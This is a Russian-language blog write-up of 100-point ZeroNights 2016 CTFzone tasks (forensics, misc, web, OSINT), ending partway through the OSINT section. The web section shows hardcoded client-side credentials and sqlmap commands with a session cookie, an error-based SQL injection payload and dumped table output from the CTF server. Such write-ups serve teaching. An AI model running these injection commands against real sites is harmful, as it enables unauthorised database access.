{"id":281380,"date":"2016-11-23T00:40:04","date_gmt":"2016-11-22T21:40:04","guid":{"rendered":"http:\/\/savepearlharbor.com\/?p=281380"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=281380","title":{"rendered":"[ZeroNights2016] [CTFzone] \u0411\u0435\u0437 100 \u0433\u0440\u0430\u043c\u043c \u043d\u0435 \u0440\u0430\u0437\u0431\u0435\u0440\u0451\u0448\u044c\u0441\u044f"},"content":{"rendered":"



<\/p>\n\n

\u041f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u043c \u0446\u0438\u043a\u043b \u0441\u0442\u0430\u0442\u0435\u0439, \u043f\u043e\u0441\u0432\u044f\u0449\u0435\u043d\u043d\u044b\u0439 \u0432\u0440\u0430\u0439\u0442\u0430\u043f\u0443 \u043f\u043e CTFzone, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u0440\u043e\u0445\u043e\u0434\u0438\u043b 17 \u0438 18 \u043d\u043e\u044f\u0431\u0440\u044f \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 ZeroNights2016 \u043f\u043e\u0434 \u0444\u043b\u0430\u0433\u043e\u043c Bi.Zone. \u0412 \u044d\u0442\u043e\u0442 \u0440\u0430\u0437 \u043c\u044b \u043f\u043e\u0433\u043e\u0432\u043e\u0440\u0438\u043c \u043e \u0437\u0430\u0434\u0430\u043d\u0438\u044f\u0445, \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043f\u0440\u0438\u043d\u043e\u0441\u0438\u043b\u043e \u043f\u043e 100 \u043e\u0447\u043a\u043e\u0432 \u0432 \u043f\u043e\u043b\u044c\u0437\u0443 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0445\u0430\u043a\u0435\u0440\u043e\u0432!
<\/a> <\/p>\n

\u041f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0435 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u0438 \u0438\u0437 \u0434\u0430\u043d\u043d\u043e\u0433\u043e \u0446\u0438\u043a\u043b\u0430<\/b><\/p>\n
1) \u0420\u0430\u0437\u0431\u043e\u0440 \u043f\u043e\u043b\u0451\u0442\u043e\u0432 \u0437\u0430 50<\/a> <\/div>\n<\/div>\n

\u041e\u0442\u0434\u0435\u043b\u044c\u043d\u043e\u0435 \u0441\u043f\u0430\u0441\u0438\u0431\u043e GH0st3rs<\/a> \u0437\u0430 \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0435 \u0432\u0440\u0430\u0439\u0442\u0430\u043f\u044b \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0437\u0430\u0434\u0430\u043d\u0438\u0439.<\/p>\n

FORENSIC100 \u2014 Master of Strings<\/b><\/h5>\n

<\/p>\n

Rise and shine, Lieutenant, stop dreaming of drinking vodka and playing with the bear. A.U.R.O.R.A. is speaking and it\u2019s time you stopped sleeping at your workplace. You can\u2019t idle your time anymore as the whole world might go down the drain unless, well\u2026 Let’s say it\u2019s time you are back in the game. The right man in the wrong place can change the world. So wake up, Lieutenant, find a password for the Spaceship panel and join the forces on Earth!<\/p><\/blockquote>\n

\u041a \u0437\u0430\u0434\u0430\u043d\u0438\u044e \u043f\u0440\u0438\u043b\u0430\u0433\u0430\u043b\u0441\u044f 7z \u0430\u0440\u0445\u0438\u0432 \u0441 \u0444\u0430\u0439\u043b\u043e\u043c ‘.RAM’ \u0432\u043d\u0443\u0442\u0440\u0438. \u041b\u043e\u0433\u0438\u0447\u043d\u043e, \u0447\u0442\u043e \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0441\u043b\u0435\u043f\u043e\u043a \u041e\u0417\u0423. \u0411\u044b\u043b\u043e \u043f\u0440\u0438\u043d\u044f\u0442\u043e \u0440\u0435\u0448\u0435\u043d\u0438\u0435 \u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c \u0432 \u0441\u0442\u043e\u0440\u043e\u043d\u0443 ‘Volatility’. \u0415\u0449\u0451 \u0440\u0430\u0437 (\u0434\u0432\u0430\/\u0442\u0440\u0438) \u043f\u0440\u043e\u0447\u0438\u0442\u0430\u0432 \u0437\u0430\u0434\u0430\u043d\u0438\u0435 \u0438 \u043f\u0440\u043e\u043b\u0438\u0441\u0442\u0430\u0432 Wiki \u043f\u043e Volatility, \u043c\u043e\u0436\u043d\u043e \u0431\u044b\u043b\u043e \u0437\u0430\u043c\u0435\u0442\u0438\u0442\u044c \u0440\u0430\u0437\u0434\u0435\u043b \u00abStrings\u00bb \u0438 \u0443\u0432\u0438\u0434\u0435\u0442\u044c \u0441\u0441\u044b\u043b\u043a\u0443 \u043d\u0430 SysInternals Strings<\/a>. \u0420\u0430\u0437\u0443\u043c\u0435\u0435\u0442\u0441\u044f, \u0435\u0451 \u043c\u044b \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c:<\/p>\n

strings.exe task_forensic_100.ram > output<\/code><\/pre>\n
  \u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c output \u043d\u0430 ~70\u041c\u0411 \u0438\u0437 \u0441\u0442\u0440\u043e\u043a UNICODE \u0434\u043b\u0438\u043d\u043e\u0439 \u0431\u043e\u043b\u0435\u0435 3 \u0441\u0438\u043c\u0432\u043e\u043b\u043e\u0432 (\u043f\u043e-\u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e). 
  \u041e\u0442\u043a\u0440\u044b\u0432 \u0435\u0433\u043e \u0442\u0435\u043a\u0441\u0442\u043e\u0432\u044b\u043c \u0440\u0435\u0434\u0430\u043a\u0442\u043e\u0440\u043e\u043c, \u044f \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u043b\u0441\u044f \u043d\u0430 \u043f\u043e\u0438\u0441\u043a\u0438 \u0444\u043b\u0430\u0433\u0430, \u2014 \u00ab\u0410 \u0432\u0434\u0440\u0443\u0433?\u00bb. 
  \u041a\u0430\u043a\u043e\u0432\u043e \u0436\u0435 \u0431\u044b\u043b\u043e \u043c\u043e\u0451 \u0443\u0434\u0438\u0432\u043b\u0435\u043d\u0438\u0435:<\/p>\n
<\/div>\n
  \u041a\u0430\u043a \u043f\u043e\u0442\u043e\u043c \u043e\u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c: \u043c\u043e\u0439 \u0432\u0430\u0440\u0438\u0430\u043d\u0442 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0444\u043b\u0430\u0433\u0430 \u043e\u043a\u0430\u0437\u0430\u043b\u0441\u044f \u043d\u0435 \u0442\u0430\u043a\u0438\u043c, \u043a\u0430\u043a\u0438\u043c \u0435\u0433\u043e \u043f\u043b\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043b \u00ab\u0430\u0432\u0442\u043e\u0440\u00bb. \u041d\u0443, \u0447\u0442\u043e \u0436\u0435, \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0442\u0430\u043a \u0434\u0430\u0436\u0435 \u043b\u0443\u0447\u0448\u0435.<\/p>\n
MISC100 \u2014 Nerdy Mechanic<\/b><\/h5>\n
  <\/p>\n
A.U.R.O.R.A.: Lieutenant, let me introduce you to Sergeant Varvara. She needs your help.
  Sergeant Varvara: Lieutenant, this terminal is not working. I entered my request but there is some gibberish on the screen. Our air mechanic was the last to work on this terminal. Would you take a look?<\/p><\/blockquote>\n
  \u041d\u0438\u0436\u0435 \u043d\u0430\u043c \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0442 \u0442\u043e\u0442 \u0441\u0430\u043c\u044b\u0439 \u00ab\u043a\u0440\u0438\u0432\u043e\u0439\u00bb \u0432\u044b\u0432\u043e\u0434 \u0438\u0437 \u0442\u0435\u0440\u043c\u0438\u043d\u0430\u043b\u0430:<\/p>\n
why ir -iagp irbie -t cifap iw;-pfqlfrg -sfm DFG gukjlpi.cym\/dnwalwbw pfrfg<\/code><\/pre>\n
  \u0427\u0442\u043e \u0436\u0435 \u0441 \u044d\u0442\u0438\u043c \u0434\u0435\u043b\u0430\u0442\u044c? \u0414\u0430\u0432\u0430\u0439\u0442\u0435 \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u0432\u043d\u0438\u043c\u0430\u0442\u0435\u043b\u044c\u043d\u0435\u0435: \u043a\u043e\u043d\u0435\u0446 \u043f\u044f\u0442\u043e\u0439 \u0441\u0442\u0440\u043e\u043a\u0438 \u043e\u0447\u0435\u043d\u044c \u043d\u0430\u043f\u043e\u043c\u0438\u043d\u0430\u0435\u0442 \u0441\u0441\u044b\u043b\u043a\u0443. \u041e\u0434\u043d\u0430\u043a\u043e, \u043d\u0443\u0436\u043d\u043e \u0437\u0430\u043c\u0435\u043d\u0438\u0442\u044c: ‘y’ -> ‘o’. \u0422\u043e\u0433\u0434\u0430 \u0438 \u0432 \u043f\u0435\u0440\u0432\u043e\u0439 \u0441\u0442\u0440\u043e\u043a\u0435 ‘why’ \u043f\u0440\u0435\u0432\u0440\u0430\u0449\u0430\u0435\u0442\u0441\u044f \u0432 ‘who’ \u2014 \u0410\u0433\u0430! \u2014 \u043e\u0447\u0435\u0432\u0438\u0434\u043d\u043e, \u0447\u0442\u043e \u044d\u0442\u043e \u0438\u043d\u0442\u0435\u0440\u043f\u0440\u0435\u0442\u0430\u0442\u043e\u0440 Bash. \u041c\u043e\u0436\u0435\u0442 \u0432 \u044d\u0442\u043e\u043c \u0437\u0430\u0434\u0430\u043d\u0438\u0438 \u0438 \u0431\u044b\u043b\u0430 \u043d\u0435\u043a\u0430\u044f \u043b\u043e\u0433\u0438\u043a\u0430 \u043f\u043e\u0434\u043c\u0435\u043d\u044b \u0431\u0443\u043a\u0432, \u043e\u0434\u043d\u0430\u043a\u043e \u043d\u0430\u0431\u0440\u043e\u0441\u0430\u0432 \u043f\u0440\u043e\u0441\u0442\u0435\u043d\u044c\u043a\u0438\u0439 \u0441\u043a\u0440\u0438\u043f\u0442 \u0432 Python \u043c\u0435\u0442\u043e\u0434\u043e\u043c \u043f\u0440\u043e\u0431, \u0440\u0435\u0448\u0435\u043d\u0438\u0435 \u043f\u0440\u0438\u0448\u043b\u043e \u0441\u0430\u043c\u043e \u0441\u043e\u0431\u043e\u0439:<\/p>\n
print(text.replace('y','o').replace('j','y').replace('n','j').replace('k','n').replace('u','v').replace('l','u').replace('i','l').replace('r','s').replace('e','k').replace('f','e').replace('p','r').replace('g','t').replace('G','T').replace(';','p').replace('d','g').replace('D','G').replace('F','E').replace('v','i'))<\/code><\/pre>\n
  \u0412 \u0438\u0442\u043e\u0433\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u043e\u0441\u044c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0435:<\/p>\n
who  ls -latr  lsblk -t  clear  lwp-request -sem GET tinyurl.com\/gjwauwbw  reset <\/code><\/pre>\n
  \u041f\u0435\u0440\u0435\u0445\u043e\u0434\u0438\u043c \u043f\u043e \u0441\u0441\u044b\u043b\u043a\u0435 \u0438 \u0432\u0438\u0434\u0438\u043c \u0444\u043b\u0430\u0433: ctfzone{182ac24a3b2dc86ba298f57d9c391c0b}<\/p>\n
WEB100 \u2014 Search Engine<\/b><\/h5>\n
  <\/p>\n
Lieutenant (You): A.U.R.O.R.A., I\u2019m in the SNT-47 compartment, in the general-purpose room. Thermal signatures are missing. I need to find a way to connect to the ship communications and it\u2019s urgent, what should I do?
  A.U.R.O.R.A.: Welcome to the information retrieval system A.U.R.O.R.A. Please name your identification number.
  You: What identification number?! Are you broken as well?? Let’s see what you have inside if I don\u2019t want to stay here forever…<\/p><\/blockquote>\n
  \u041a \u0437\u0430\u0434\u0430\u043d\u0438\u044e \u043f\u0440\u0438\u043b\u0430\u0433\u0430\u043b\u0430\u0441\u044c \u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u0441\u0430\u0439\u0442 \u0441 \u0444\u043e\u0440\u043c\u043e\u0439 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438:<\/p>\n
<\/div>\n
  \u0421 \u0447\u0435\u0433\u043e \u043d\u0430\u0447\u0430\u0442\u044c? \u041f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e: \u0441 \u043f\u043e\u0438\u0441\u043a\u0430 \u043f\u043e \u0438\u0441\u0445\u043e\u0434\u043d\u043e\u043c\u0443 \u043a\u043e\u0434\u0443 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b. \u0418\u0434\u0451\u043c \u0442\u0443\u0434\u0430 \u0438 \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0435\u043c:<\/p>\n
<script src=\/static\/js\/pewpew.js type="text\/javascript"><\/script><\/code><\/pre>\n
  \u041e\u0442\u043a\u0440\u044b\u0432\u0430\u0435\u043c, \u0441\u043c\u043e\u0442\u0440\u0438\u043c:<\/p>\n
     if ('s3cr3tuser' === $(ctrls[0]).find('input').val()      && 'v3rySTr0ngP@ss' === $(ctrls[1]).find('input').val()) {<\/code><\/pre>\n
  \u041d\u0435\u0432\u043e\u043e\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u043c \u0432\u0437\u0433\u043b\u044f\u0434\u043e\u043c \u043c\u044b \u043f\u043e\u043d\u0438\u043c\u0430\u0435\u043c \u0447\u0442\u043e \u043a \u0447\u0435\u043c\u0443. \u0412\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0435\u043c\u0441\u044f \u043d\u0430 \u0444\u043e\u0440\u043c\u0443 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438 \u0438 \u0438\u0434\u0451\u043c \u0434\u0430\u043b\u044c\u0448\u0435. \u041f\u0435\u0440\u0435\u0434 \u043d\u0430\u043c\u0438 \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0430 \u0441 \u0435\u0434\u0438\u043d\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0439 \u0441\u0442\u0440\u043e\u043a\u043e\u0439 \u043f\u043e\u0438\u0441\u043a\u0430. \u00ab\u0410 \u043d\u0435 SQLi \u043b\u0438 \u0437\u0434\u0435\u0441\u044c \u0447\u0430\u0441\u043e\u043c?\u00bb, \u2014 \u0434\u043e\u043b\u0436\u043d\u043e \u043f\u043e\u0441\u043b\u044b\u0448\u0430\u0442\u044c\u0441\u044f \u0432 \u0433\u043e\u043b\u043e\u0432\u0435. \u0418\u0434\u0451\u043c \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0442\u044c: \u0431\u0438\u043d\u0433\u043e!<\/p>\n
<\/div>\n
  \u0427\u0442\u043e \u0436\u0435, \u0440\u0430\u0441\u0447\u0435\u0445\u043b\u044f\u0435\u043c \u0441\u0442\u0430\u0440\u044b\u0439 \u0434\u043e\u0431\u0440\u044b\u0439 SqlMap (\u043a\u043e\u043d\u0435\u0447\u043d\u043e, \u043c\u043e\u0436\u043d\u043e \u0438 \u0440\u0443\u043a\u0430\u043c\u0438). \u041d\u0435 \u0437\u0430\u0431\u044b\u0432\u0430\u0435\u043c \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u043c\u044b \u043f\u0440\u043e\u0438\u0437\u0432\u0435\u043b\u0438 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u044e => \u043d\u0443\u0436\u043d\u043e \u0443\u043a\u0430\u0437\u0430\u0442\u044c Cookies. \u0412 \u0446\u0435\u043b\u044f\u0445 \u044d\u043a\u043e\u043d\u043e\u043c\u0438\u0438 \u043c\u0435\u0441\u0442\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0441\u0442\u0432\u0430 \u00ab\u0432\u044b\u0432\u043e\u0434\u00bb \u043d\u0435 \u043f\u043e\u043b\u043d\u044b\u0439:<\/p>\n
root@hackzard:~# sqlmap -u "http:\/\/78.155.219.6\/search\/param1*" --cookie="session=eyJ1c2VybmFtZSI6InMzY3IzdHVzZXJzZkhXekRTd09WSVlQR0oifQ.Cw6t3A.obdrULM4zqHM6FlQcQh_uaPtgmg" --level=3 --dbms=MySQL --tables<\/code><\/pre>\n
\u0412\u044b\u0432\u043e\u0434 \u043a\u043e\u043c\u0430\u043d\u0434\u044b<\/b><\/p>\n
Parameter: #1* (URI)
   Type: error-based
   Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
   Payload: http:\/\/78.155.219.6:80\/search\/param1'||(SELECT 'bGEm' FROM DUAL WHERE 8985=8985 AND (SELECT 1912 FROM(SELECT COUNT(*),CONCAT(0x7170716a71,(SELECT (ELT(1912=1912,1))),0x7176717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'
  ---
  [18:30:29] [INFO] testing MySQL
  [18:30:29] [INFO] confirming MySQL
  [18:30:29] [INFO] the back-end DBMS is MySQL
  back-end DBMS: MySQL >= 5.0.0
  [18:30:29] [INFO] fetching database names
  [18:30:29] [INFO] the SQL query used returns 5 entries
  [18:30:29] [INFO] resumed: information_schema
  [18:30:29] [INFO] resumed: mysql
  [18:30:29] [INFO] resumed: performance_schema
  [18:30:29] [INFO] resumed: sqli_100
  [18:30:29] [INFO] resumed: sys
  [18:30:29] [INFO] fetching tables for databases: 'information_schema, mysql, performance_schema, sqli_100, sys'
  [18:30:29] [INFO] the SQL query used returns 282 entries<\/code>  <\/div>\n<\/div>\n
  <\/p>\n
root@hackzard:~# sqlmap -u "http:\/\/78.155.219.6\/search\/param1*" --cookie="session=eyJ1c2VybmFtZSI6InMzY3IzdHVzZXJzZkhXekRTd09WSVlQR0oifQ.Cw6t3A.obdrULM4zqHM6FlQcQh_uaPtgmg" --level=3 --dbms=MySQL -D "sqli_100" -T "wtf3thisiss3crettable_dont_read_dont_touch" --columns<\/code><\/pre>\n
\u0412\u044b\u0432\u043e\u0434 \u043a\u043e\u043c\u0430\u043d\u0434\u044b<\/b><\/p>\n
Database: sqli_100
  Table: wtf3thisiss3crettable_dont_read_dont_touch
  [2 columns]
  +--------+--------------+
  | Column | Type |
  +--------+--------------+
  | id | int(5) |
  | secret | varchar(500) |
  +--------+--------------+<\/code>  <\/div>\n<\/div>\n
  <\/p>\n
root@hackzard:~# sqlmap -u "http:\/\/78.155.219.6\/search\/param1*" --cookie="session=eyJ1c2VybmFtZSI6InMzY3IzdHVzZXJzZkhXekRTd09WSVlQR0oifQ.Cw6t3A.obdrULM4zqHM6FlQcQh_uaPtgmg" --level=3 --dbms=MySQL -D "sqli_100" -T "wtf3thisiss3crettable_dont_read_dont_touch" -C "secret" --dump<\/code><\/pre>\n
\u0412\u044b\u0432\u043e\u0434 \u043a\u043e\u043c\u0430\u043d\u0434\u044b<\/b><\/p>\n
Database: sqli_100
  Table: wtf3thisiss3crettable_dont_read_dont_touch
  [13 entries]
  +-----------------------------------------+
  | secret |
  +-----------------------------------------+
  | 089b1d5d37c22d81b55b6f77c9e2b042 |
  | asdkkjhjsdaojewifdiowuefdw0 |
  | asdkkjhjsdaojewifdiowuefdw0 |
  | dskjhwjkfhsjdkfhsjdkhfjk |
  | dskjhwjkfhsjdkfhsjdkhfjk |
  | dskjhwjkfhsjdkfhsjdkhfjk |
  | dskjhwjkfhsjdkfhsjdkhfjk |
  | lfhdwrekfgbuhwoeijfdweoifjweoif |
  | lfhdwrekfgbuhwoeijfdweoifjweoif |
  | lfhdwrekfgbuhwoeijfdweoifjweoif |
  | lfhdwrekfgbuhwoeijfdweoifjweoif |
  | REMEMBER_FLAG_FORMAT.FLAG_IN_THIS_TABLE |
  | REMEMBER_FLAG_FORMAT.FLAG_IN_THIS_TABLE |
  +-----------------------------------------+<\/code>  <\/div>\n<\/div>\n
  \u041d\u0430\u0441 \u043f\u0440\u043e\u0441\u044f\u0442 \u043d\u0435 \u0437\u0430\u0431\u044b\u0432\u0430\u0442\u044c \u0444\u043e\u0440\u043c\u0430\u0442 \u0444\u043b\u0430\u0433\u0430, \u0432\u0435\u0434\u044c \u043e\u043d \u0432 \u044d\u0442\u043e\u0439 \u0442\u0430\u0431\u043b\u0438\u0446\u0435. \u0410 \u0432\u043e\u0442 \u0438 \u043e\u043d: ctfzone{089b1d5d37c22d81b55b6f77c9e2b042}<\/p>\n
OSINT100 \u2014 Weird Guy<\/b><\/h5>\n
  <\/p>\n
A.U.R.O.R.A.: Lieutenant, our agents sneaked in Cosmos hotel and witnessed the preparations for ZERONIGHTS 2016. Everyone was busy installing their stands and making photos. There was a weird guy in the hall who was absorbed in reading something on his laptop. We couldn\u2019t figure out who was this guy but we need to know what he was looking at the screen. This photo might help you.<\/p><\/blockquote>\n
  \u041a \u0437\u0430\u0434\u0430\u043d\u0438\u044e \u043f\u0440\u0438\u043b\u0430\u0433\u0430\u043b\u0430\u0441\u044c \u0444\u043e\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u044f:<\/p>\n
<\/div>\n
  \u041d\u0430 \u0444\u043e\u0442\u043e \u043c\u044b \u043c\u043e\u0436\u0435\u043c \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0442\u044c \u043a\u0430\u043a \u0441\u0435\u043b\u0444\u044f\u0442\u0441\u044f<\/s> \u043e\u0434\u0438\u043d \u0447\u0435\u043b\u043e\u0432\u0435\u043a \u0444\u043e\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u0440\u0443\u0435\u0442 \u0434\u0440\u0443\u0433\u043e\u0433\u043e, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0437\u0430\u043c\u0435\u0442\u0438\u0442\u044c, \u0447\u0442\u043e \u0442\u0440\u0435\u0431\u0443\u0435\u043c\u044b\u0439 \u044d\u043a\u0440\u0430\u043d \u043f\u043e\u043f\u0430\u0434\u0430\u0435\u0442 \u0432 \u043e\u0431\u043b\u0430\u0441\u0442\u044c \u0444\u043e\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u0438. \u0417\u0430\u0434\u0430\u0447\u0430 \u044f\u0441\u043d\u0430: \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u043d\u0430\u0439\u0442\u0438 \u0444\u043e\u0442\u043e \u0441 \u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e\u0433\u043e \u0440\u0430\u043a\u0443\u0440\u0441\u0430. \u0423\u0447\u0438\u0442\u044b\u0432\u0430\u044f, \u0447\u0442\u043e \u0434\u0430\u043d\u043d\u044b\u0439 CTF \u043d\u043e\u0441\u0438\u0442 \u0438\u043d\u0442\u0435\u0440\u043d\u0430\u0446\u0438\u043e\u043d\u0430\u043b\u044c\u043d\u044b\u0439 \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440 \u0437\u0430\u0434\u0430\u0451\u043c\u0441\u044f \u0432\u043e\u043f\u0440\u043e\u0441\u043e\u043c: \u00ab\u041a\u0430\u043a\u043e\u0439 \u0441\u0430\u0439\u0442 \u043d\u0430\u043c \u043d\u0443\u0436\u0435\u043d?\u00bb. \u041f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e \u2014 Instagram. \u0414\u0430\u043b\u0435\u0435, \u044d\u0442\u0430 \u0437\u0430\u0434\u0430\u0447\u0430 \u0438\u043c\u0435\u043b\u0430 \u0431\u044b \u0434\u0432\u0430 \u0440\u0435\u0448\u0435\u043d\u0438\u044f:  <\/p>\n